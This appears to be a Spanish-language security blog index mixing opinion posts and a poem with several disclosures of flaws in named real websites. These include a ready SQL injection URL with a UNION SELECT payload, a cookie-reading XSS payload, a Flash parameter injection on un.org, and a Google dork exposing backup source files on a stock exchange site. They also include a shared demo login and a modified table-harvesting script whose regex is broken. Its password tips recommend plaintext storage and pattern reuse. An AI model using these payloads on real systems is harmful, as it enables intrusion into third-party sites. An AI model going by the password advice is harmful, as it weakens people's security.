¿Y ahora les interesa la Seguridad informática?

Viendo hoy en día los últimos acontecimientos en lo que muchos llamamos una revolución cibernetica en donde el acceso a la información se a convertido en la manzana de la discordia, en un mundo en el que latinoamerica se encuentra (Hubiera querido utilizar encontraba) desprotegida ante la falta de seguridad en muchos paises y empresas que no le dan la importancia debida a este tema.

Pero hoy todos deberíamos de pensar un poco mas lo que publicamos y en donde lo hacemos, los desarrolladores hoy por hoy escuchamos mas seguido la palabra "hackers" eso sin duda alguna nos debería de hacer detenernos un poco mas en las lineas que programamos, porque no solo se hace una herramienta que solucionara un problema o necesidad sino que, si la herramienta contiene bugs o errores que comprometan los datos se podrían convertir en armas que compartan información o que permitan utilizar nuestros recursos para actos delictivos.
Como se hace actualmente, ingresar (lease hackear) a una web subir archvios para hacer Phishing o para realizar ataques a otros sitios, esto no solo compromete al delincuente que realiza el delito, sino que podría causar un momento bochornoso a una empresa que tenga que aclarar los sucedido y dar explicaciones publicas y lógicamente el riesgo de perder la confianza de sus clientes.

En tantos aspectos influye ahora la seguridad informática, y es que el detalle es, que si tienes buena seguridad nadie se da cuenta pero si no la tienes puede que todo el mundo lo sepa y solamente tu no, hasta que alguien decida reportarlo o explotarlo.

Y termino con el titulo del post.

¿Y ahora les interesa la Seguridad informática?

Hasta la PROXYma.

Read more »

Zone-h , la mayor base de datos de hacks a sido hackeada

Zona-h.com , un sitio muy conocido por tener espejos de sitios hackeados, fue hackeada esta hace algunas horas.

Para los que no saben exactamente sobre que es esta web;

Esta web es utilizada por hackers para publicar los sitios o servidores que "hackeado".

En el mensaje se lee:

Note : It’s Unacceptable when we tried to notify defaced.zone-h.net and found tNote : It’s Unacceptable when we tried to notify defaced.zone-h.net and found this message ” nice try” it’s not a try it’s a real! your server rooted, all the websites hacked, all people knew that ! and it’s the third time to hack your websites 2 of them in 2010( 2010/04/02 > Brazilian domains + 06/2010 zone-h.com defacement database ),and now ! you should have the courage and allow the defacers to notify your sites, it’s the real courage !

La otra parte de la imagen:

Read more »

[Ferock] Me Presento...

Saludos amigos que nos visitan desde los reconditos mas lejanos de la red, me presento atentamente a ustedes como @ferock un simple programador y amante de la seguridad informatica que les estara compartiendo contenido desde el dia de hoy.

Para comenzar les comentare una anecdota de como obtuve acceso a un sistema, y que debemos tomar en cuenta para preveer estos incidentes.

En la universidad en la que estudio, presentaron un sistema de Clases Online, lo realizaron en el auditorio principal de la Universidad y mientras un instructor nos explicaba como acceder al portal de clases online, a lo que ponia atencion, mientras el ingresaba con un Usuario de demostracion a lo que pude observar, el password y la contraseña tenian el mismo numero de caracteres, a lo cual pude deducir que eran la misma palabra, no quise quedarme con la duda y al tener una computadora lo pude comprobar:

Usuario: alumno

Password: alumno

Sacando una moraleja de este tan insignificante pero importante descuido, muchas veces descuidamos la seguridad de nuestros datos, creemos que para no complicarnos la vida y no olvidar nuestra contraseña ponemos una facil y listo, pero es en ese momento que debemos reflexionar: ¿Que es lo que estamos protegiendo?, ¿Qué información pongo en riesgo si se obtiene esa contraseña? ¿Qué exponemos? y mas concretamente ¿Qué pasa si adivinan mi contraseña?.

Aqui les dejo unos consejos para tomar en cuenta al momento de crear o cambiar una contraseña que les serviran para proteger su información de cualquiera:

1. Nunca uses palabras faciles (Dios, amor, password, tu nombre, etc).

2. Nunca uses solo numeros Ejemplo: (123456, 1988, 1990, 2001, 07072012, ni fechas) pues pueden ser obtenidas con facilidad mediante fuerza bruta.

3. Utiliza caracteres especiales, por ejemplo: # $ % & / ( ! @.

4. No utilizar la misma contraseña para todos tus accesos. Te recomendaria usaras una contraseña generica para tu accesos que no son tan importantes y evitar tener una contraseña para cada sitio que te registres. También puede usar un patron y agregar algo relacionado con tu acceso, por ejempli: patron+fb, patron+tw, patron+wifi, patron+pc, etc.

5. Guarda tus contraseñas en un archivo de texto y guardalo en un lugar seguro.

Estos son algunos de los consejos para generar una contraseña segura, o al menos que no sea tan facil de adivinar (Hay que dificultar un poco al menos las cosas a los atacantes).

Read more »

Anonymous, Ciber War y Megaupload.

Los últimos hechos ocurridos ha desenvuelto una avalancha de información, unos hablan de ciberterrorismo, otros de ciber guerra y hasta del "fin del mundo virtual".

Pero yo traigo algunas preguntas, por ejemplo:

-¿Casualidad que un día después de las protestas pacificas por SOPA hayan cerrado Megaupload?

-¿El FBI cierra megaupload sabiendo que algunos llamados por los medios de comunicación "grupos de hackers" saldrán en defensa y tomarían acciones por lo que hizo el FBI?

-¿En todo el mundo ayer hubo problemas con algunos enlaces de Internet, otra casualidad o saturación de tráfico?

Todo me parece una jugada bien planeada por el FBI y el gobierno de USA, sabían que Anonymous respondería ante esa acción, el FBI se prepara para capturar información durante los ataques de las ips de donde venían, sabiendo que Anonymous se a vuelto una moda y que muchas de las personas que participan en estos ataques no toman las medidas de precaución necesarias del caso, como por ejemplo la popular herramienta web (LOIC) que usan y que cualquiera que quiera parecer "jacker" entra y la utiliza para aparentar se un genio de la computación frente a sus amigos, como en diversos blogs, foros y redes sociales publican mensajes "Ingresa a esta web y déjala abierta para apoyar #OPMegaupload".

En mi opinión el FBI va a capturar unos cuantos "Anonymous" y ya la moda de este grupo entre la gente que quiere aparentar ser algo que aun no es se acabara, y de seguir Anonymous sera realmente con 1337
Pero Anonymous necesitara que la gente los apoye o podrán desarrollar este tipo de ataques sin ayuda masiva?...

Le doy cierta razón a los Mayas, para los cuales el calendario llegaba hasta Diciembre de 2012, pero será este el comienzo del fin de Internet un mundo abierto que nos lleno de conocimientos (buenos y malos), y que ahora con SOPA y esta Ciber guerra que desde hace días está sucediendo..está en peligro de extinción, porque el internet sin libertad (Libertad distinto de libertinaje) de poco o nada nos serviría.

Pero siendo optimista y viendo el vaso medio lleno, puede ser el comienzo de una revolución creativa en donde todos veamos maneras de crear o de reinventar medios de comunicación y otros tipos de redes o aparatos que con los adelantos tecnológicos y conocimientos que tenemos actualmente un atraso nos podría llevar a un mayor adelanto.

"En tiempos de crisis la imaginación es más efectiva que el intelecto." Albert Einstein.

En mi humilde opinión.


Hasta la PROXYma.

Read more »

Pésima Atención al cliente en Chat de towebs.com

Hoy buscaba un servicio de web-hosting y en especial estaba interesado en un VPS , publique en mi TL que me recomendaran algun webhosting y esta persona @MarianoLoPrety me escribió sobre http://www.towebs.com entre a la web y decidí pedir mas información sobre el servicio de Housing que anuncian en su sitio.

Lo que me sucedió en lugar de enojarme me dio risa, el pobre Eduardo estaba frustrado.


Y mejor les coloco la "charla"que tuve con el operador llamado Eduardo:

[ 13:17:59 ] Consulta : Consulta
[ 13:18:08 ] Sistema : Usted fue atendido en 10 segundos por Eduardo
[ 13:18:08 ] Eduardo : Bienvenido a ToWebs, ¿en qué lo puedo ayudar?
[ 13:18:29 ] Eduardo : Que tal buenas tardes en que puedo ayudarlo?
[ 13:18:36 ] Cliente : buen dia, quisiera saber un poco mas sobre el servicio VPS que tienen
[ 13:18:46 ] Eduardo : No ofrecemos VPS, esta mal en el sitio
[ 13:18:50 ] Eduardo : solo webhosting tradicional
[ 13:18:51 ] Eduardo : compàrtido
[ 13:18:54 ] Eduardo : Tenemos planes desde 18,90 pesos mas iva mensuales
[ 13:19:01 ] Cliente : y el de Housing ?
[ 13:19:12 ] Eduardo : Tampoco ofrecemos Housing
[ 13:19:42 ] Cliente : LINK
[ 13:19:49 ] Cliente : y eso ?
[ 13:20:15 ] Eduardo : Hagamos algo, le paso el mail donde puede pedir explicaciones sobre por qué no vendemos algo que está en el sitio
[ 13:20:20 ] Eduardo : yo ya me canse de darlas disculpe
[ 13:20:23 ] Eduardo : consultas@towebs.com
[ 13:20:31 ] Eduardo : no damos esos servicios, y no quieren sacarlo del sitio
[ 13:20:40 ] Eduardo : puede enviar una queja o lo que tenga ganas a esa casilla
[ 13:20:42 ] Eduardo : Tiene alguna otra consulta en que lo pueda ayudar?
[ 13:23:51 ] Cliente : gracias por nada
[ 13:23:57 ] Eduardo : El chat ha finalizado

Y la imagen que hace constar:

Read more »

Pequeño Bug en la web de Naciones Unidas (un.org) y en la Casa Blanca (USA)

El Bug se encuentra específicamente en:

http://www.un.org/webcast/swfs/player.swf

En en parámetro: file

En donde podemos inyectar una imagen externa de esta manera:

http://www.un.org/webcast/swfs/player.swf?file=http://www.subinet.es/wp-content/uploads/2011/06/peligro-hackers-trabajando-3.png &autostart=true&plugins=false&stretching=uniform

Este es un bug para ser precisos en este player swf que utilizan multiples sitios como por ejemplo:

http://www.whitehouse.gov/

http://mediacenter.intel.com.br

http://harvardmedicine.hms.harvard.edu



Hasta la PROXYma.

Read more »

Poesía Hacker

Si el titulo lo dice todo, leyendo y buscando informacion en internet me tope con el blog de David Emerling Rondon ganador del II Festival de Poesía Hacker que se realizo en el Sexto Congreso Nacional de Software Libre (6ºCnSL).
Es de hace mas o menos un año pero realmente es sus letras se plasma el sentimiento de muchos de nosotros amantes de los bytes y que nos pasamos horas entre paquetes de información.

si mas les dejo el poema titulado:

Somos muchos, seremos mas...



 From Wiki CNSL Caracas 2010
"Somos muchos... Seremos más"
es acaso un insulto
querer intentar mejor uso
de la memoria de mis pensamientos
de los recursos que consumo
si existe libre universo
donde me siento mas seguro
donde no tengo el temor
de ser pirata alguno
Donde la paz y tranquilidad
me llevan rápido a navegar
por cada rincón de mi libertad
sin temor a fallar.
sin querer hacer daño alguno
y si acaso se me complica la situación
no dudo, busco a la comunidad
preguntas y respuestas;
mil cosas de que hablar,
probar, ensayar y aprender
¡¿díganme que no es divina la libertad?!
si cuando pienso que las cosas no se van a dar
algún grupo, alguna persona de la comunidad
me aclara, me ayuda y aveces sin cobrar.
que puedo repetirlo
cual chismoso en vecindad
que puedo cambiarlo y hasta alterar
¡con estas ganas que tengo yo de cooperar!
el ser parte de algo
que por siempre perdurará
ayudará a muchos a mejorar
a descubrir sus libertad
hoy siendo muchos
mañana serán más
porque soy los que soy
por lo que son los demás.
Por David Emerling Rondón
Licencia, copyleft 2010 - Reconocimiento-Sin obras derivadas 3.0
Retrieved from "http://cnsl.netlynx.com.ve/index.php?title=Somos_muchos..._Seremos_m%C3%A1s"

Read more »

[XSS] AMCHAM – Honduras , iSQL en ASP

El error de XSS se encuentra en el buscador en español de dicha web

http://www.amchamhonduras.org/buscar_es.asp

Al realizar la siguiente busqueda por ejemplo podriamos robar cookies de sesion :

<script>
 alert ('Mi Cookie!:'+document.cookie)
</script>


Y por su fuera poco esto tambien genera un error en la base de datos:

Microsoft OLE DB Provider for ODBC Drivers error '80040e21'

ODBC driver does not support the requested properties.

Hasta la PROXYma 

Read more »

[iSQL] en COMCEL Music

El Link Mágico es el siguiente:

http://www.wazzupmusic.com/sitio/albums.php?accion=artista&idartista=1%20UNION%20SELECT%201,2,3,4--

Esto lo tenia entre mis archivos, por alguna razón que no recuerdo no lo había posteado jejeje.

Pero ahi esta el link.
Es interesante porque la empresa desarrolladora de este sistema globalnetmobile.com, tenia el mismo bug pero ya lo repararon en las siguientes paginas:


http://www.musica.tigo.com.py/sitio/albums.php?accion=artista&idartista=949%27
http://www.tigomusic.com.co/sitio/albums.php?accion=artista&idartista=949%27
http://www.tigomusic.com.gt/sitio/albums.php?accion=artista&idartista=1093%27
http://www.tigomusic.com.sv/sitio/albums.php?accion=artista&idartista=1093%27
http://www.alomusic.cr/sitio/albums.php?accion=artista&idartista=1491
http://www.orangemusicstore.com.do/albums.php?accion=artista&idartista=883%27

Imagino que se les paso por alto el que les he mostrado.


Hasta la PROXYma.

Read more »

Facebook y la Copa Hacker 2012

Por si no lo sabias Facebook organiza cada año el “Hacker Cup” donde se espera encontrar a los mejores programadores del mundon, donde el ganador se llevará un premio de unos 5000 dólares y también tendrá la posibilidad de tener un lugar en el equipo de dicha red social.

Ya se abrió la inscripción por si te animas a participar HackerCup.

Abrá una ronda de clasificación donde en un plazo de 72 horas se tiene que resolver de manera correcta uno de los tres problemas que se presenten.

A los participantes que pasen esa etapa, le espera 3 rondas más donde se irán escogiendo a partir de los resultados a los 25 mejores. Este pequeño grupo tendrá que viajar a la Central de Facebook en California (con los gastos pagos) donde se llevará a cabo la final.

Read more »

Information Disclosure Bolsa de valores de Lima, Perú

Estaba jugando en Google y quise buscar entre la "basura".. esos archivitos que a veces creamos o se crean automáticamente y luego olvidamos que existen.

Y esos son los archivos .BAK

Con este dork: ext:bak site:bvl.com.pe

Parte de la info. que muestra el archivo:

<%@ page language="java"
         contentType="text/html"
         info="INCATRACK"
         import="java.sql.*, java.io.*, hi.httpserver.oracle.*,

         hi.general.*,hi.httpserver.general.*,hi.httpserver.oracle.*, 

         java.util.*, java.lang.* "
         session="false"
%>

Asi que cuidado con esos archivos de backup, porque google puede ver 

más allá de lo evidente!

Saludos y Hasta la PROXYma.

Read more »

Sqlharvest modificado para crear nuestros diccionarios personalizados de nombres de tablas

Sqlharvest viene en los extras de sqlmap, estaba husmeando los archivos que trae el sqlmap-dev y me tope con este interesante script vi su codigo y me parecio interesante agregarle alguna cosita.
Pero primero explicare que es lo que hace el script original:
Ingresas a /slmap-dev/extra/sqlharvest
Ahi le das permisos de ejecución al scrip sqlharvest.py y lo ejecutas (./sqlharvest.py), cuando lo haces el comienza a buscar en Google esto: CREATE TABLE ext:sql que en esencia es un Dork.

El script realiza la búsqueda de archivos con extension SQL y guarda los nombres de tablas que encuentra dentro de ellos en el archivo tables.txt que se encuentra en la misma carpeta.

Lo que yo le agregue es que reciba un Dork extra como parámetro para buscar por dominio por ejemplo y lo ejecutaría de la siguiente manera:

./sqlharvest "site:gt"

Lógicamente buscara archivos solo en los dominios .gt y ya aquí es cuestión de vuestra imaginación.

A continuación el código:

#!/usr/bin/env python

"""
$Id: sqlharvest.py 4224 2011-07-07 20:10:03Z inquisb $

Copyright (c) 2006-2011 sqlmap developers (http://www.sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""

import cookielib
import re
import socket
import sys
import urllib
import urllib2
import ConfigParser

from operator import itemgetter

def main():

    TIMEOUT = 10
    CONFIG_FILE = 'sqlharvest.cfg'
    TABLES_FILE = 'tables.txt'
    USER_AGENT = 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; AskTB5.3)'
    SEARCH_URL = 'http://www.google.com/m?source=mobileproducts&dc=gorganic'
    MAX_FILE_SIZE = 2*1024*1024 # if a result (.sql) file for downloading is more than 2MB in size just skip it
    QUERY = 'CREATE TABLE ext:sql'
    DORK = sys.argv[1]
    QUERY=QUERY+'+'+DORK
    REGEX_URLS = r';u=([^"]+)'
    REGEX_RESULT = r'CREATE TABLE\s*(/\*.*\*/)?\s*(IF NOT EXISTS)?\s*(?P[^\(;]+)'

    tables = dict()
    refiles = re.compile(REGEX_URLS)
    retables = re.compile(REGEX_RESULT, re.I)

    cookies = cookielib.CookieJar()
    cookie_processor = urllib2.HTTPCookieProcessor(cookies)
    opener = urllib2.build_opener(cookie_processor)
    opener.addheaders = [('User-Agent', USER_AGENT)]

    conn = opener.open(SEARCH_URL)
    page = conn.read() #set initial cookie values

    config = ConfigParser.ConfigParser()
    config.read(CONFIG_FILE)
    if not config.has_section('options'):
        config.add_section('options')

    if not config.has_option('options',  'index'):
        config.set('options',  'index', '0')

    i = int(config.get('options',  'index'))

    try:
        f = open(TABLES_FILE, 'r')
        for line in f.xreadlines():
            if len(line) > 0 and ',' in line:
                temp = line.split(',')
                tables[temp[0]] = ''#int(temp[1])
        f.close()
    except:
        pass

    socket.setdefaulttimeout(TIMEOUT)

    files, oldFiles = None, None
    try:
        while True:
            abort = False
            oldFiles = files
            files = []
            try:
                conn = opener.open('%s&q=%s&start=%d&sa=N' % (SEARCH_URL, QUERY.replace(' ', '+'), i*10))
                page = conn.read()
                for match in refiles.finditer(page):
                    files.append(urllib.unquote(match.group(1)))
                    if len(files) >= 10: break
                abort = (files == oldFiles)

            except KeyboardInterrupt:
                raise

            except Exception, msg:
                print msg

            if abort:
                break

            sys.stdout.write("\n---------------\n")
            sys.stdout.write("Result page #%d\n" % (i+1))
            sys.stdout.write("---------------\n")

            for sqlfile in files:
                print sqlfile
                try:
                    req = urllib2.Request(sqlfile)
                    response = urllib2.urlopen(req)

                    if response.headers.has_key('Content-Length'):
                        if int(response.headers.get('Content-Length')) > MAX_FILE_SIZE:
                            continue

                    page = response.read()
                    found = False
                    counter = 0

                    for match in retables.finditer(page):
                        counter += 1
                        table = match.group("result").strip().strip("`").strip("\"").strip("'").replace('"."', ".").replace("].[", ".").strip('[').strip(']')

                        if table and '>' not in table and '<' not in table and '--' not in table and ' ' not in table:
                            found = True
                            sys.stdout.write('*')

                            if table in tables:
                                tables[table] += 1
                            else:
                                tables[table] = 1
                    if found:
                        sys.stdout.write("\n")

                except KeyboardInterrupt:
                    raise

                except Exception, msg:
                    print msg

            else:
                i += 1

    except KeyboardInterrupt:
        pass

    finally:
        f = open(TABLES_FILE, 'w+')

        tables = sorted(tables.items(), key=itemgetter(1), reverse=True)

        for table,count in tables:
            f.write("%s\n" % (table))

        f.close()
        config.set('options',  'index', str(i+1))

        f = open(CONFIG_FILE, 'w+')
        config.write(f)
        f.close()

if __name__ == "__main__":
    main()
< /pre>

Read more »